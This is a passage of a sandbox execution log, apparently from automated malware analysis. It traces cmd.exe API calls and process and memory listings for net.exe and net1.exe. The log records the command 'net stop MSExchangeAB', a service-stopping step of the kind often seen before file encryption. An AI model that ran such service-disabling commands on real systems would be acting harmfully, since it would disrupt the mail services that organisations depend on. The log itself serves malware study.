_String2="DATE") returned 10 [0134.921] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0134.921] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0134.921] _wcsicmp (_String1="net", _String2="MD") returned 1 [0134.921] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0134.921] _wcsicmp (_String1="net", _String2="RD") returned -4 [0134.921] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0134.921] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0134.921] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0134.921] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0134.921] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0134.921] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0134.921] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0134.921] _wcsicmp (_String1="net", _String2="VER") returned -8 [0134.921] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0134.921] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0134.921] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0134.921] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0134.921] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0134.921] _wcsicmp (_String1="net", _String2="START") returned -5 [0134.921] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0134.921] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0134.921] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0134.921] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0134.921] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0134.921] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0134.921] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0134.921] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0134.921] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0134.921] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0134.921] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0134.921] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0134.921] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0134.921] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0134.922] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0134.922] _wcsicmp (_String1="net", _String2="CD") returned 11 [0134.922] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0134.922] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0134.922] _wcsicmp (_String1="net", _String2="REN") returned -4 [0134.922] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0134.922] _wcsicmp (_String1="net", _String2="SET") returned -5 [0134.922] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0134.922] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0134.922] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0134.922] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0134.922] _wcsicmp (_String1="net", _String2="MD") returned 1 [0134.922] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0134.922] _wcsicmp (_String1="net", _String2="RD") returned -4 [0134.922] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0134.922] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0134.922] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0134.922] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0134.922] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0134.922] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0134.922] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0134.922] _wcsicmp (_String1="net", _String2="VER") returned -8 [0134.922] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0134.922] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0134.922] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0134.922] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0134.922] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0134.922] _wcsicmp (_String1="net", _String2="START") returned -5 [0134.922] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0134.922] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0134.922] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0134.922] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0134.922] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0134.922] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0134.922] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0134.922] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0134.922] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0134.922] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0134.922] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0134.922] _wcsicmp (_String1="net", _String2="IF") returned 5 [0134.922] _wcsicmp (_String1="net", _String2="REM") returned -4 [0134.922] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0134.923] SetErrorMode (uMode=0x0) returned 0x0 [0134.923] SetErrorMode (uMode=0x1) returned 0x0 [0134.923] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4df05d0, lpFilePart=0x4b4f47c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4b4f47c*="Desktop") returned 0x1d [0134.923] SetErrorMode (uMode=0x0) returned 0x1 [0134.923] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0134.923] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0134.930] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0134.930] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0134.930] GetConsoleTitleW (in: lpConsoleTitle=0x4b4f6fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.931] InitializeProcThreadAttributeList (in: lpAttributeList=0x4b4f628, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4b4f60c | out: lpAttributeList=0x4b4f628, lpSize=0x4b4f60c) returned 1 [0134.931] UpdateProcThreadAttribute (in: lpAttributeList=0x4b4f628, dwFlags=0x0, Attribute=0x60001, lpValue=0x4b4f614, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4b4f628, lpPreviousValue=0x0) returned 1 [0134.931] GetStartupInfoW (in: lpStartupInfo=0x4b4f660 | out: lpStartupInfo=0x4b4f660*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0134.931] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0134.931] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0134.932] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeAB", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4b4f5b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeAB", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4b4f5fc | out: lpCommandLine="net stop MSExchangeAB", lpProcessInformation=0x4b4f5fc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xde0, dwThreadId=0xdf0)) returned 1 [0134.938] CloseHandle (hObject=0xa4) returned 1 [0134.938] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0134.938] GetEnvironmentStringsW () returned 0x4df9ec8* [0134.938] FreeEnvironmentStringsA (penv="=") returned 1 [0134.938] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0135.058] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4b4f594 | out: lpExitCode=0x4b4f594*=0x2) returned 1 [0135.058] CloseHandle (hObject=0xa8) returned 1 [0135.058] _vsnwprintf (in: _Buffer=0x4b4f67c, _BufferCount=0x13, _Format="%08X", _ArgList=0x4b4f59c | out: _Buffer="00000002") returned 8 [0135.059] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0135.059] GetEnvironmentStringsW () returned 0x4dfb3a8* [0135.059] FreeEnvironmentStringsA (penv="=") returned 1 [0135.059] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0135.059] GetEnvironmentStringsW () returned 0x4dfb3a8* [0135.059] FreeEnvironmentStringsA (penv="=") returned 1 [0135.059] DeleteProcThreadAttributeList (in: lpAttributeList=0x4b4f628 | out: lpAttributeList=0x4b4f628) [0135.059] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.059] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0135.059] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.059] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0135.059] _get_osfhandle (_FileHandle=0) returned 0x38 [0135.059] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0135.059] SetConsoleInputExeNameW () returned 0x1 [0135.059] GetConsoleOutputCP () returned 0x1b5 [0135.060] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0135.060] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.060] exit (_Code=2) Thread: id = 590 os_tid = 0xe08 Process: id = "186" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf592000" os_pid = "0xb00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "185" os_parent_pid = "0xdb0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9505 start_va = 0x7fe9a000 end_va = 0x7fe9afff entry_point = 0x0 region_type = private name = "private_0x000000007fe9a000" filename = "" Region: id = 9506 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9507 start_va = 0xf231f40000 end_va = 0xf231f5ffff entry_point = 0x0 region_type = private name = "private_0x000000f231f40000" filename = "" Region: id = 9508 start_va = 0xf231f60000 end_va = 0xf231f73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f231f60000" filename = "" Region: id = 9509 start_va = 0xf231f80000 end_va = 0xf231fbffff entry_point = 0x0 region_type = private name = "private_0x000000f231f80000" filename = "" Region: id = 9510 start_va = 0x7df5ffcf0000 end_va = 0x7ff5ffceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffcf0000" filename = "" Region: id = 9511 start_va = 0x7ff6c4000000 end_va = 0x7ff6c4022fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4000000" filename = "" Region: id = 9512 start_va = 0x7ff6c4023000 end_va = 0x7ff6c4023fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4023000" filename = "" Region: id = 9513 start_va = 0x7ff6c402e000 end_va = 0x7ff6c402ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c402e000" filename = "" Region: id = 9514 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 9515 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9516 start_va = 0xf231f40000 end_va = 0xf231f4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f231f40000" filename = "" Region: id = 9517 start_va = 0xf231f50000 end_va = 0xf231f56fff entry_point = 0x0 region_type = private name = "private_0x000000f231f50000" filename = "" Region: id = 9518 start_va = 0xf231fc0000 end_va = 0xf23207dfff entry_point = 0xf231fc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9519 start_va = 0xf232080000 end_va = 0xf2320bffff entry_point = 0x0 region_type = private name = "private_0x000000f232080000" filename = "" Region: id = 9520 start_va = 0xf2320c0000 end_va = 0xf2320c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f2320c0000" filename = "" Region: id = 9521 start_va = 0xf2320d0000 end_va = 0xf2320d6fff entry_point = 0x0 region_type = private name = "private_0x000000f2320d0000" filename = "" Region: id = 9522 start_va = 0xf2320e0000 end_va = 0xf2320e0fff entry_point = 0x0 region_type = private name = "private_0x000000f2320e0000" filename = "" Region: id = 9523 start_va = 0xf2320f0000 end_va = 0xf2320f0fff entry_point = 0x0 region_type = private name = "private_0x000000f2320f0000" filename = "" Region: id = 9524 start_va = 0xf2321a0000 end_va = 0xf23229ffff entry_point = 0x0 region_type = private name = "private_0x000000f2321a0000" filename = "" Region: id = 9525 start_va = 0xf2322a0000 end_va = 0xf232427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f2322a0000" filename = "" Region: id = 9526 start_va = 0xf232440000 end_va = 0xf23244ffff entry_point = 0x0 region_type = private name = "private_0x000000f232440000" filename = "" Region: id = 9527 start_va = 0xf232450000 end_va = 0xf2325d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f232450000" filename = "" Region: id = 9528 start_va = 0xf2325e0000 end_va = 0xf2339dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f2325e0000" filename = "" Region: id = 9529 start_va = 0x7ff6c3f00000 end_va = 0x7ff6c3ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3f00000" filename = "" Region: id = 9530 start_va = 0x7ff6c402c000 end_va = 0x7ff6c402dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c402c000" filename = "" Region: id = 9531 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 9532 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 9533 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9534 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9535 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 9536 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9537 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9538 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9539 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9540 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9541 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9542 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 9543 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 9544 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 587 os_tid = 0xde8 Thread: id = 588 os_tid = 0xdf4 Thread: id = 589 os_tid = 0xdec Process: id = "187" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0xf20e000" os_pid = "0xde0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "185" os_parent_pid = "0xdb0" cmd_line = "net stop MSExchangeAB" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9558 start_va = 0xe0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 9559 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 9560 start_va = 0x110000 end_va = 0x123fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 9561 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 9562 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9563 start_va = 0x1f0000 end_va = 0x1f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 9564 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 9565 start_va = 0x210000 end_va = 0x211fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9566 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 9567 start_va = 0x240000 end_va = 0x423ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 9568 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9569 start_va = 0x7eda0000 end_va = 0x7edc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eda0000" filename = "" Region: id = 9570 start_va = 0x7edc5000 end_va = 0x7edc5fff entry_point = 0x0 region_type = private name = "private_0x000000007edc5000" filename = "" Region: id = 9571 start_va = 0x7edcc000 end_va = 0x7edcefff entry_point = 0x0 region_type = private name = "private_0x000000007edcc000" filename = "" Region: id = 9572 start_va = 0x7edcf000 end_va = 0x7edcffff entry_point = 0x0 region_type = private name = "private_0x000000007edcf000" filename = "" Region: id = 9573 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9574 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9575 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9576 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9577 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9578 start_va = 0x4390000 end_va = 0x439ffff entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 9579 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9580 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9581 start_va = 0x4400000 end_va = 0x44fffff entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 9582 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 591 os_tid = 0xdf0 Thread: id = 592 os_tid = 0xe0c Process: id = "188" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x11041000" os_pid = "0xe10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "187" os_parent_pid = "0xde0" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeAB" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9583 start_va = 0xfe0000 end_va = 0xffffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 9584 start_va = 0x1000000 end_va = 0x1001fff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 9585 start_va = 0x1010000 end_va = 0x1023fff entry_point = 0x0 region_type = 